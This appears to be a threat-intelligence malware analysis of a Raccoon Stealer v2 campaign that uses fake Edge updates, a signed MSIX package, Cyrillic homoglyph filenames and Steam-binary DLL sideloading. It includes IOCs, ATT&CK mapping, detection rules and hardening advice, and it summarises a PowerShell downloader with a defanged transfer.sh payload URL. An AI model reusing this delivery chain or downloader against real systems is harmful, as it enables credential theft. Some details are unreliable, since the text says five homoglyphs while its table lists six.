highStealer

ClearFake Meets HijackLoader: Dissecting a Raccoon Stealer v2 Campaign Built on Signed MSIX Packages and Cyrillic Homoglyphs

PublishedMarch 12, 2026

Threat Actors:ProfileAssessment

stealerdll-sideloadingsocial-engineeringcredential-theftc2exploitapt

TL;DR: A weaponized MSIX package disguised as a Microsoft Edge installer delivers Raccoon Stealer v2 through a four-stage infection chain: ClearFake fake browser update social engineering leads to a code-signed MSIX package (signed by UK entity STECH CONSULTANCY LIMITED via SSL.com), which triggers PowerShell-based payload retrieval from transfer[.]sh, followed by DLL sideloading through a legitimate Valve/Steam binary (HijackLoader technique). The package filename uses five Cyrillic Unicode homoglyph characters to visually impersonate "MicrosoftEdgeSetup.appx" while evading filename-based blocklists. The final payload is a 19.4 MB NSIS installer embedded as a PE overlay in the Steam binary, delivering Raccoon Stealer v2 for credential theft, browser data exfiltration, and cryptocurrency wallet harvesting.

Key Findings

This investigation reveals a carefully layered attack chain that abuses trust at every stage -- from compromised websites to legitimate code signing certificates to trusted application binaries. Each component is designed to defeat a specific defensive layer.

Unicode Homoglyph Filename Spoofing

The MSIX package filename is not what it appears to be. Five Cyrillic Unicode characters are substituted for their visually identical Latin counterparts:

Position	Displayed Character	Actual Character	Unicode Code Point	Script
3	c	U+0441	Cyrillic Small Letter Es	Cyrillic
5	o	U+043E	Cyrillic Small Letter O	Cyrillic
7	o	U+043E	Cyrillic Small Letter O	Cyrillic
10	E	U+0415	Cyrillic Capital Letter Ie	Cyrillic
13	e	U+0435	Cyrillic Small Letter Ie	Cyrillic
15	e	U+0435	Cyrillic Small Letter Ie	Cyrillic

The rendered filename appears as MicrosoftEdgeSetup.appx to the human eye, but the underlying byte sequence is entirely different from the ASCII representation. This defeats any filename-based blocklist or detection rule that checks for the string "MicrosoftEdgeSetup" using standard string matching.

Legitimate Code Signing Certificate Abuse

The MSIX package is signed with a legitimate SSL.com Code Signing certificate issued to STECH CONSULTANCY LIMITED, a UK company registered in Poringland, GB:

Subject: CN=STECH CONSULTANCY LIMITED, O=STECH CONSULTANCY LIMITED, L=Poringland, C=GB
Issuer: SSL.com Code Signing Intermediate CA RSA R1
Serial: 0ad3ec95833032eebf53b660984cc67d
Validity: 2023-04-03 to 2024-04-01
Thumbprint (SHA256): 7f7c9adfc6447b9a1a6da4c60bde9d6ed74482d530534c7599651d1de55fef97

The certificate was valid at the time of the sample's first observation (September 2023). Code-signed MSIX packages bypass Windows SmartScreen warnings, significantly increasing the likelihood that victims will execute the package without suspicion.

ClearFake Distribution Network

The sample is tagged by multiple vendors as part of the ClearFake campaign -- a JavaScript injection framework that compromises legitimate websites to display fake browser update pages. The ClearFake chain works as follows:

Legitimate WordPress/CMS sites are compromised via stolen credentials or plugin vulnerabilities.
Injected JavaScript displays a convincing "Update Microsoft Edge" overlay.
Victims are redirected to download the weaponized MSIX package.
The code signature provides the final trust nudge to overcome user hesitation.

Legitimate Binary Sideloading

The HijackLoader component uses KSPSService.exe, which is actually a legitimate Valve/Steam secure_desktop_capture binary signed by McAfee. This binary imports tier0_s.dll and crashhandler.dll as part of its normal Steam framework dependencies. By placing trojanized versions of these DLLs in the same directory, the attacker exploits Windows DLL search order to load malicious code through a trusted, signed executable.

Attack Chain

The infection progresses through four distinct stages, each adding a layer of legitimacy and evasion.

[Compromised Website]
         |
         v
[ClearFake JavaScript Injection]
         |
         v
[Fake "Update Microsoft Edge" Prompt]
         |
         v
[Download: Ml<U+0441>r<U+043E>s<U+043E>ft<U+0415>dg<U+0435>S<U+0435>tup.appx]
  (Appears as MicrosoftEdgeSetup.appx)
  (Code-signed by STECH CONSULTANCY LIMITED)

Stage 2: MSIX Package Execution

The MSIX package installs via Windows App Installer with the following identity:

Package Name: MicrosoftCorporation.Edge
Publisher Display Name: Microsoft Corporation (spoofed)
Actual Publisher: CN=STECH CONSULTANCY LIMITED
Capability: runFullTrust
Builder: Advanced Installer 21.0.1 (build 2178626c)

The package uses the MSIX Package Support Framework (PSF), a legitimate Microsoft framework designed to apply runtime fixups to Win32 desktop applications packaged as MSIX. The entry point AI_STUBS\AiStubX64.exe reads a config.json file and triggers the PSF start script.

Stage 3: PowerShell Payload Download

The PSF start script chrome.ps1 executes:

[Net.ServicePointManager]::SecurityProtocol = TLS 1.2 | TLS 1.3

Download from: hxxps://transfer[.]sh/get/7rozvr4XO3/MicrosoftEdgeSetup[.]exe
Save to:       %APPDATA%\MicrosoftEdgeSetup.exe
User-Agent:    Chrome 116 spoof
Method:        Start-Job (background execution for evasion)

Key OPSEC features:

Forces TLS 1.2/1.3 to avoid plaintext interception
Spoofs a Chrome 116 User-Agent to blend with normal traffic
Uses Start-Job for background execution, reducing visibility in process trees
The transfer[.]sh URL is ephemeral and may already be expired

Stage 4: HijackLoader and Raccoon Stealer v2

[MicrosoftEdgeSetup.exe -- Legitimate MS Edge stub (DECOY)]
         |
         + (Meanwhile, VFS\AppData\KSPSService.exe executes)
         |
         v
[KSPSService.exe -- Valve/Steam secure_desktop_capture]
  |-- PE Overlay: 19.42 MB NSIS installer (LZMA, DEADBEEF magic)
  |-- DLL sideloading: tier0_s.dll, crashhandler.dll
         |
         v
[PsfRuntime32.dll / PsfRuntime64.dll]
  |-- Process injection via CreateProcess + GetThreadContext
  |-- Microsoft Detours library for API hooking
         |
         v
[NSIS Installer Extraction + Raccoon Stealer v2]
  |-- Browser credential theft
  |-- Cryptocurrency wallet harvesting
  |-- Cookie and autofill extraction
  |-- System fingerprinting
  |-- C2 beaconing

Infrastructure Analysis

Payload Staging

Component	Host	IP	ASN	Status
transfer[.]sh payload	Hetzner Online GmbH	`144[.]76[.]136[.]153`	Hetzner	LIVE

The payload staging server at 144[.]76[.]136[.]153 runs OpenSSH 9.2p1 on Debian with only port 22 exposed. The transfer[.]sh service is a legitimate file sharing platform frequently abused for malware staging because of its ephemeral link structure -- files are automatically deleted after a configurable period, and the random URL path (7rozvr4XO3) is not enumerable.

Code Signing Infrastructure

The STECH CONSULTANCY LIMITED certificate was issued by SSL.com, a certificate authority that offers code signing certificates with organization validation. The certificate was valid for one year (April 2023 to April 2024). Several possibilities exist for how it was obtained:

Fraudulent company registration: The UK company may have been created specifically for obtaining code signing certificates.
Certificate theft: The legitimate company's certificate may have been compromised.
Insider sale: The company or an employee may have sold certificate access.

The certificate is not listed on any Certificate Suspension/Ban List (CSCB) as of this investigation, meaning it has not been formally revoked or flagged by the CA ecosystem.

MSIX Package Construction

The package was built with Caphyon Advanced Installer 21.0.1, a legitimate commercial packaging tool. The PDB paths in the embedded binaries all point to C:\ReleaseAI\, which is the standard Advanced Installer build output directory. This indicates the attacker used a licensed or cracked copy of Advanced Installer to create a professional-quality MSIX package.

NSIS Overlay Details

The HijackLoader host binary (KSPSService.exe) contains a 19.42 MB PE overlay starting at offset 0x2A8600:

Property	Value
Size	20,364,360 bytes (19.42 MB)
Magic	`EFBEADDE` (DEADBEEF little-endian)
Identifier	NullsoftInst
Compression	LZMA (0x5D marker)
Entropy	7.9784 bits/byte

The near-maximum entropy (8.0 = perfectly random) confirms the overlay is encrypted or compressed data, consistent with LZMA-compressed NSIS installers.

Detection

YARA Summary

Detection rules target multiple stages of this attack chain:

MSIX/APPX Package Detection: Matches the combination of AppxManifest.xml markers, the STECH CONSULTANCY LIMITED publisher string, and the runFullTrust capability declaration. This catches the delivery package before execution.
Unicode Homoglyph Filename: Detects files containing mixed Latin and Cyrillic characters in sequences that approximate common software names (Microsoft, Edge, Chrome, Firefox). This is a behavioral rule that catches the social engineering technique regardless of the specific payload.
HijackLoader via Steam Binary: Matches the Valve/Steam secure_desktop_capture PDB path combined with unusual PE overlay sizes (>10MB), identifying the legitimate binary being abused as a sideloading host.
PowerShell transfer.sh Downloader: Detects PowerShell scripts that download from transfer.sh URLs, particularly when combined with TLS forcing and user-agent spoofing.

Suricata Summary

Network detection rules cover:

transfer.sh Payload Download: Alerts on HTTPS connections to transfer[.]sh with the specific URL path pattern (/get/[alphanumeric]/), particularly when the response contains PE headers or large binary payloads.
MSIX Installation from External Source: Detects App Installer protocol handler invocations for packages downloaded from non-Microsoft domains.
ClearFake JavaScript Injection Patterns: Matches the characteristic JavaScript injection patterns used by ClearFake to display fake browser update overlays on compromised websites.

IOCs (Defanged)

Network Indicators

hxxps://transfer[.]sh/get/7rozvr4XO3/MicrosoftEdgeSetup[.]exe
144[.]76[.]136[.]153 (transfer[.]sh staging -- Hetzner Online GmbH)

File Indicators

MSIX Package (Delivery):

SHA256: b583d86c4abc6d6ca57bde802b7e9d8143a249aed6a560a4626e79ae13f6209d
SHA1:   10e3b5e5cabcfbe1e79caa1a47efd994122d5429
MD5:    a7900cdbb2912d76aa6329c5c41d8609

KSPSService.exe (HijackLoader Host):

SHA256: d60d4da2cfe120138a3fde66694b40ae2710cfc2af33cb7810b3a0e9b1663a4f
SHA1:   78e17bd7e30c66aaef91a5b5fcb36a036a1074b7
MD5:    d113b3debc7e0a2da4369dd8d1dbad53
Imphash: df40d8be5c4e5f68cce5e2718020b391

MicrosoftEdgeSetup.exe (Legitimate Decoy):

SHA256: 7d94e045fc80fb985385702b11312b6dbadecf802168328cb0db0f62cc66fa3c
SHA1:   1890ad1d2b7dd04f6b4f07a50362662436ace295
MD5:    58d8d75b0ca5e316862ed81cdb2d0c67

AiStubX64.exe (MSIX Entry Point):

SHA256: 815d2e32e948681c85d56aff9eb9ac597647effa8da6db2b81fa2109f9875ff6

PsfRuntime32.dll (Injector):

SHA256: 4fdcf20237f161fb827bccd1faaee61217e5f8d3229a8dff507c98d1bda9aac6

PsfRuntime64.dll (Injector):

SHA256: 8b86893d2a721474b816bfc0228dbbe9b9bc6c1d7bde870c37200074501081fb

chrome.ps1 (PowerShell Downloader):

SHA256: ce54b949607227a4b5b1f521b5ec0c37e4bde1549c667e53f56cf3b5b6156d35

config.json (PSF Configuration):

SHA256: f5a0191c8622041d31ecfa05f90718b74034b8645a37ee41e7570769e138bda6

Behavioral Indicators

Registry key:     Software\Caphyon\Advanced Installer\MicrosoftEdgeSetup.exe
Registry key:     SOFTWARE\Microsoft\EdgeUpdate\WindowsUpdateAttempts
File drop path:   %APPDATA%\MicrosoftEdgeSetup.exe
User-Agent:       Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
                  (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
MSIX Publisher:   CN=STECH CONSULTANCY LIMITED, O=STECH CONSULTANCY LIMITED,
                  L=Poringland, C=GB
Cert Thumbprint:  7f7c9adfc6447b9a1a6da4c60bde9d6ed74482d530534c7599651d1de55fef97
Cert Serial:      0ad3ec95833032eebf53b660984cc67d

MITRE ATT&CK Mapping

Tactic	Technique	ID	Application
Initial Access	Drive-by Compromise	T1189	ClearFake JavaScript injection on compromised websites
Execution	User Execution: Malicious File	T1204.002	Victim installs MSIX package from fake update prompt
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	chrome.ps1 downloads and executes second-stage payload
Persistence	Boot or Logon Autostart Execution	T1547	MSIX package registration persists across reboots
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	Unicode homoglyph filename spoofing + Edge branding
Defense Evasion	Subvert Trust Controls: Code Signing	T1553.002	STECH CONSULTANCY LIMITED SSL.com certificate
Defense Evasion	Hijack Execution Flow: DLL Side-Loading	T1574.002	tier0_s.dll and crashhandler.dll sideloading via Steam binary
Defense Evasion	Obfuscated Files: Software Packing	T1027.002	LZMA-compressed NSIS installer in PE overlay
Defense Evasion	Process Injection	T1055	PsfRuntime DLL injection via Microsoft Detours
Command and Control	Ingress Tool Transfer	T1105	Payload download from transfer[.]sh
Credential Access	Credentials from Password Stores	T1555	Raccoon Stealer v2 browser credential theft
Collection	Data from Local System	T1005	Cryptocurrency wallet harvesting and system fingerprinting

Threat Actor Assessment

Attribution

Confidence: LOW-MEDIUM
Campaign: ClearFake distribution network
Region: Eastern European nexus. The use of Cyrillic Unicode homoglyphs indicates native familiarity with the Cyrillic script, pointing to operators from Russia, Ukraine, or Bulgaria. Raccoon Stealer v2 itself is a Russian-origin MaaS product.
Motivation: Financial -- commodity credential theft at scale

Operational Security

Strengths:

Legitimate code signing certificate from an established CA
Ephemeral transfer[.]sh links that auto-expire
Legitimate binary sideloading (Valve/Steam signed by McAfee)
Professional MSIX packaging with Advanced Installer
PowerShell background job execution to reduce process visibility

Weaknesses:

Cyrillic homoglyph selection reveals script familiarity (attribution fingerprint)
Advanced Installer PDB paths (C:\ReleaseAI\) are standard and traceable
Sample submitted to MalwareBazaar by crep1x with origin tagged as France
The specific Valve/Steam binary choice creates a distinctive sideloading signature

Why This Campaign Matters

This operation represents the commoditization of trust abuse in the Windows ecosystem. Every component -- the ClearFake injection, the MSIX packaging, the code signing, the PSF framework, the Steam binary -- is a legitimate technology being weaponized. Defenders cannot simply block these components without breaking legitimate functionality. The defense challenge is distinguishing malicious combinations of legitimate tools from their normal use, which requires behavioral analysis and correlation rather than signature-based detection.

Defensive Recommendations

Immediate Actions

Block the certificate thumbprint 7f7c9adfc6447b9a1a6da4c60bde9d6ed74482d530534c7599651d1de55fef97 in endpoint protection.
Hunt for KSPSService.exe and chrome.ps1 on endpoints.
Block transfer[.]sh at the web proxy for organizations that do not use it legitimately.
Submit a certificate revocation request to SSL.com for serial 0ad3ec95833032eebf53b660984cc67d.

Policy Changes

Implement MSIX/APPX sideloading restrictions via Group Policy. Only allow packages from the Microsoft Store or trusted internal sources.
Block MSIX packages requesting runFullTrust capability from untrusted publishers.
Deploy Unicode homoglyph detection in email and web gateway filename inspection.
Monitor for tier0_s.dll and crashhandler.dll loading outside of legitimate Steam directories.

Long-Term Hardening

Implement application control policies that restrict which binaries can load DLLs from their own directory (preventing sideloading abuse).
Deploy ClearFake JavaScript injection detection on managed web properties.
Consider blocking PowerShell Start-Job with Invoke-WebRequest to external file sharing services as a high-confidence malicious pattern.

Published by Breakglass Intelligence -- GHOST automated analysis pipeline. Investigation ID: raccoon-march10 | TLP:WHITE | 2026-03-10